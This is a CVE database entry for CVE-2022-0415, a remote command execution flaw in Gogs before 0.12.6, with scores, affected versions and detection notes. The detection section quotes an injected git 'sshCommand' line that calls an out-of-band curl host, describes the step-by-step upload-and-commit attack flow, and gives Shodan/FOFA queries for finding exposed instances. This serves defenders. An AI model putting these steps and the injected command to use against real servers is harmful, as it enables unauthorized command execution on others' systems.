cbcvebase.
CVE-2022-0415
published 2022-03-21

CVE-2022-0415: Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.

PriorityP275high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
65.24%
99.2th percentile
Remote Command Execution in uploading repository file in GitHub repository gogs/gogs prior to 0.12.6.

Affected

3 ranges
VendorProductVersion rangeFixed in
gogs.iogogs>= 0 < 0.12.60.12.6
gogsgogs< 0.12.60.12.6
gogsgogs_gogs>= unspecified < 0.12.60.12.6

Detection & IOCsextracted from sources · hover to see the quote

url/<username>/<repo>/upload-file
url/<username>/<repo>/_upload/master/
filenameconfig
commandsshCommand = curl http://{{interactsh-url}} -I
path/.git/
otherX-Csrf-Token header present in upload-file multipart POST
  • Exploit uploads a malicious git 'config' file via the repository file upload endpoint (upload-file), injecting an sshCommand directive for RCE. Look for multipart POST requests to /<user>/<repo>/upload-file with a filename of 'config' and a body containing 'sshCommand'.
  • After uploading the malicious config, the attacker commits it to /.git/ via POST to /_upload/master/ with tree_path=/.git/. Monitor for commit operations targeting the .git directory path.
  • Exploitation requires authentication (PR:L). The attack flow is: login → create repo → upload malicious git config → commit to .git path. Authenticated sessions with repo-creation activity followed by upload-file and _upload/master/ requests are suspicious.
  • Shodan/FOFA fingerprinting queries for exposed Gogs instances: search for http.title 'sign in - gogs' or CPE cpe:2.3:a:gogs:gogs to identify attack surface.
  • Vulnerable versions are Gogs prior to 0.12.6. Detect via the page body containing 'content="Gogs' to confirm the target is a Gogs instance.
  • Out-of-band callback (DNS/HTTP) via interactsh confirms RCE. Monitor for unexpected outbound curl/HTTP requests originating from the Gogs server process after a file upload event.
  • ·Exploitation requires a valid authenticated user account on the Gogs instance (CVSS PR:L). Anonymous exploitation is not possible.
  • ·The vulnerability is fixed in Gogs 0.12.6. Instances running 0.12.6 or later are not affected.
  • ·The attack abuses the git config sshCommand injection (CWE-434/CWE-20) — the malicious config file must be successfully committed to the .git/ directory path for RCE to trigger.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv3.09.9CRITICALCVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
osv8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.